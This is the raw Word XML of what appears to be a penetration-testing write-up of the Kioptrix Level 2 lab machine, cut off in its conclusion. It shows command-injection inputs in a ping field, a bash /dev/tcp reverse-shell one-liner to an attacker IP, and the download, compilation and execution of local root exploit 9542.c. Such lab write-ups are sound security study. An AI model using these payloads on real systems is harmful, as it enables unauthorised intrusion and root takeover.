          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="045E3612" wp14:editId="0C500AD1">
            <wp:extent cx="5731510" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="105551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06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B2BF" w14:textId="77777777" w:rsidR="00081B23" w:rsidRDefault="00081B23" w:rsidP="008877EA">
      <w:r>
        <w:t>Now since we are able to login into the machine but we can only perform ping, we will use loopback IP to check connectivity of NIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E613B67" w14:textId="77777777" w:rsidR="00081B23" w:rsidRDefault="00081B23" w:rsidP="008877EA">
      <w:r w:rsidRPr="00081B23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EA73E3" wp14:editId="74011566">
            <wp:extent cx="5731510" cy="1339850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="97583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11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993" w14:textId="54C47A71" w:rsidR="00081B23" w:rsidRDefault="00081B23" w:rsidP="008877EA">
      <w:r w:rsidRPr="00081B23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034302CD" wp14:editId="60E415C6">
            <wp:extent cx="5731510" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="99238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829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3DE1" w14:textId="2B895671" w:rsidR="00255470" w:rsidRDefault="00255470" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We will use command injection, hence let’s open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to do this task, use </w:t>
      </w:r>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>127.0.0.1;cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D46F1" w14:textId="1703AA0F" w:rsidR="00255470" w:rsidRDefault="00255470" w:rsidP="008877EA">
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029FB54E" wp14:editId="20C11CDE">
            <wp:extent cx="5731510" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40020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07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580" w14:textId="0C0FE76B" w:rsidR="0001238C" w:rsidRDefault="00255470" w:rsidP="008877EA">
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="592DA240" wp14:editId="7C3EA93B">
            <wp:extent cx="5731510" cy="3003550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="208047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719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E3BC" w14:textId="4EEED96A" w:rsidR="008C6C96" w:rsidRDefault="00255470" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">We identified after command injection database name as </w:t>
      </w:r>
      <w:r w:rsidRPr="00255470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“webapp”</w:t>
      </w:r>
      <w:r w:rsidR="008C6C96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C6C96">
        <w:t>after this command injection command cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8EAD7" w14:textId="78C871B2" w:rsidR="008C6C96" w:rsidRDefault="008C6C96" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C6C96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CBEB2C0" wp14:editId="0D5FB025">
            <wp:extent cx="5731510" cy="3346450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="8359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33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7C1E" w14:textId="0073253D" w:rsidR="00E713D8" w:rsidRPr="00E713D8" w:rsidRDefault="00E713D8" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Next, we need to us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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on Target and Attacker, first push command injection on basic administrative web console put </w:t>
      </w:r>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“127.0.0.1; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/192.168.1.3/1337 0&gt;&amp;1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DDD7F" w14:textId="408E693A" w:rsidR="00E713D8" w:rsidRDefault="00E713D8" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E713D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3267AB1D" wp14:editId="286A8D18">
            <wp:extent cx="5731510" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46107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77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887" w14:textId="7AE4AF62" w:rsidR="00E713D8" w:rsidRDefault="00E713D8" w:rsidP="008877EA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and we enable port listening on Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FB3C3" w14:textId="1C779F38" w:rsidR="00E713D8" w:rsidRDefault="00B90958" w:rsidP="008877EA">
      <w:r w:rsidRPr="00B90958">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3423F352" wp14:editId="623A71AB">
            <wp:extent cx="5645440" cy="920797"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112333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51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2505" w14:textId="74E68FAA" w:rsidR="00E713D8" w:rsidRDefault="00B90958" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">After running bash command in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>browser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we will be able to gain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access in target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA0AB3" w14:textId="0A369430" w:rsidR="00B90958" w:rsidRDefault="00B90958" w:rsidP="008877EA">
      <w:r w:rsidRPr="00B90958">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ADF9F9F" wp14:editId="06C7DDC4">
            <wp:extent cx="5731510" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="97256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613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736D" w14:textId="77777777" w:rsidR="00451373" w:rsidRPr="00B2627E" w:rsidRDefault="00451373" w:rsidP="00451373">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc149067744"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2 – Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D77E62" w14:textId="3E05B777" w:rsidR="00B90958" w:rsidRDefault="00451373" w:rsidP="00B90958">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00B90958">
        <w:t xml:space="preserve">e will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B90958">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B90958">
        <w:t xml:space="preserve"> to identify exploit available to get access, after rechecking nmap output we found that</w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidR="00B90958">
        <w:t>inux 2.6</w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t>.9</w:t>
      </w:r>
      <w:r w:rsidR="00B90958">
        <w:t xml:space="preserve"> is running with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B90958">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B90958">
        <w:t xml:space="preserve"> running centos we need to search an exploit related to this</w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B20BDF" w14:textId="7D366529" w:rsidR="00DA5B62" w:rsidRDefault="00DA5B62" w:rsidP="00B90958">
      <w:r w:rsidRPr="00DA5B62">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD3D44D" wp14:editId="42521CA7">
            <wp:extent cx="5731510" cy="3536950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="172081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0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FB89" w14:textId="491AFC02" w:rsidR="001318C2" w:rsidRDefault="001318C2" w:rsidP="00B90958">
      <w:r w:rsidRPr="001318C2">
        <w:t xml:space="preserve">We found one exploit </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locally </w:t>
      </w:r>
      <w:r w:rsidRPr="001318C2">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is having exploit for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.6.x, centos i.e., 954</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B62">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28C27A" w14:textId="7587C9CE" w:rsidR="00071D13" w:rsidRDefault="00071D13" w:rsidP="00B90958">
      <w:r>
        <w:t>First,</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B62">
        <w:t xml:space="preserve"> we need to download in our system (attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B39C12" w14:textId="729D9DE8" w:rsidR="00071D13" w:rsidRPr="001318C2" w:rsidRDefault="00071D13" w:rsidP="00B90958">
      <w:r w:rsidRPr="00071D13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23BFC7B7" wp14:editId="5D070CA9">
            <wp:extent cx="5731510" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="34808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34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2A0" w14:textId="2E220DD8" w:rsidR="00451373" w:rsidRPr="00B2627E" w:rsidRDefault="00451373" w:rsidP="00451373">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc149067745"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2 – Gain access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="63CE913F" w14:textId="6336AE75" w:rsidR="001318C2" w:rsidRPr="00071D13" w:rsidRDefault="00451373" w:rsidP="001318C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="001318C2" w:rsidRPr="001318C2">
        <w:t xml:space="preserve">e need to </w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t xml:space="preserve">transfer this exploit to Target machine, </w:t>
      </w:r>
      <w:r w:rsidR="00DA5B62">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t xml:space="preserve">o perform this we will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA5B62">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA5B62">
        <w:t xml:space="preserve"> web server</w:t>
      </w:r>
      <w:r w:rsidR="001318C2">
        <w:t xml:space="preserve"> for this</w:t>
      </w:r>
      <w:r w:rsidR="00071D13">
        <w:t xml:space="preserve"> by command “</w:t>
      </w:r>
      <w:r w:rsidR="00071D13" w:rsidRPr="00071D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service apache2 start”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257DB433" w14:textId="77F2D81D" w:rsidR="00071D13" w:rsidRDefault="00071D13" w:rsidP="001318C2">
      <w:r>
        <w:t>Before that move exploit to /</w:t>
      </w:r>
      <w:r w:rsidRPr="00071D13">
        <w:t>var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> location and make a directory in my case I have name directory downloads </w:t>
      </w:r>
      <w:r w:rsidRPr="00071D13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A59D4EF" wp14:editId="5B0C7747">
            <wp:extent cx="5731510" cy="755650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="22060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071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BE8F" w14:textId="568DA174" w:rsidR="00071D13" w:rsidRDefault="00071D13" w:rsidP="001318C2">
      <w:r>
        <w:t>Now let’s come back to target machine and perform some operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A777D9" w14:textId="49E8AC41" w:rsidR="007322D0" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r w:rsidRPr="007322D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E250463" wp14:editId="6D2654CE">
            <wp:extent cx="4959605" cy="2228965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127546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665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4484" w14:textId="640608D4" w:rsidR="00071D13" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r>
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> need to download exploit from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server we are not allowed to do it hence we need to move to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF5760" w14:textId="428F3C7B" w:rsidR="00071D13" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r w:rsidRPr="007322D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C1010B4" wp14:editId="036C1248">
            <wp:extent cx="5731510" cy="1541145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="178614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40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3B32" w14:textId="54615FA9" w:rsidR="001318C2" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r>
        <w:t>We are successfully copied or transferred exploit file to Target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFA37B" w14:textId="12C406D3" w:rsidR="007322D0" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r>
        <w:t>Next, we need to compile this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E963C" w14:textId="413C215E" w:rsidR="007322D0" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:r w:rsidRPr="007322D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AD8DDB4" wp14:editId="2CBE11F7">
            <wp:extent cx="4159464" cy="762039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145975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530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F37" w14:textId="628C9A75" w:rsidR="001318C2" w:rsidRDefault="007322D0" w:rsidP="001318C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Next, we need to install complied file in target machine</w:t>
      </w:r>
      <w:r w:rsidR="005069EC">
        <w:t xml:space="preserve"> with command </w:t>
      </w:r>
      <w:r w:rsidR="005069EC" w:rsidRPr="005069EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005069EC" w:rsidRPr="005069EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005069EC" w:rsidRPr="005069EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19B662" w14:textId="6AA1FC0F" w:rsidR="005069EC" w:rsidRDefault="005069EC" w:rsidP="001318C2">
      <w:r w:rsidRPr="005069EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="634FC38F" wp14:editId="058F0383">
            <wp:extent cx="4521200" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37628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81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1444" cy="6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D7F6" w14:textId="4E223D65" w:rsidR="005069EC" w:rsidRDefault="005069EC" w:rsidP="001318C2">
      <w:r>
        <w:t xml:space="preserve">After installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we are now root user of this machine and we got shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB700C" w14:textId="709F28D9" w:rsidR="00B066B9" w:rsidRPr="002A04D8" w:rsidRDefault="005069EC" w:rsidP="00044CE2">
      <w:r w:rsidRPr="005069EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB9D1F7" wp14:editId="52B8E385">
            <wp:extent cx="4483330" cy="342918"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121166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669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D5C" w14:textId="0526FF26" w:rsidR="00926C8F" w:rsidRPr="00B2627E" w:rsidRDefault="007463D4" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc149067746"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.0 </w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F8B2C" w14:textId="584D024A" w:rsidR="00926C8F" w:rsidRDefault="00561A40" w:rsidP="00421A75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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Kioptrix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Level 2</w:t>
      </w:r>
      <w:r w:rsidR="004A59CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00451373">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">is vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00451373">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00451373">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection and command injection and can be exploited by 9542.c </w:t>
      </w:r>
      <w:r w:rsidR="00583185">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>available locally in</w:t>
      </w:r>
      <w:r w:rsidR="0045137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583185">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>searchexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00583185">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00336EB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> By the help of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336EB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336EB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> we were able to access machine with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336EB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
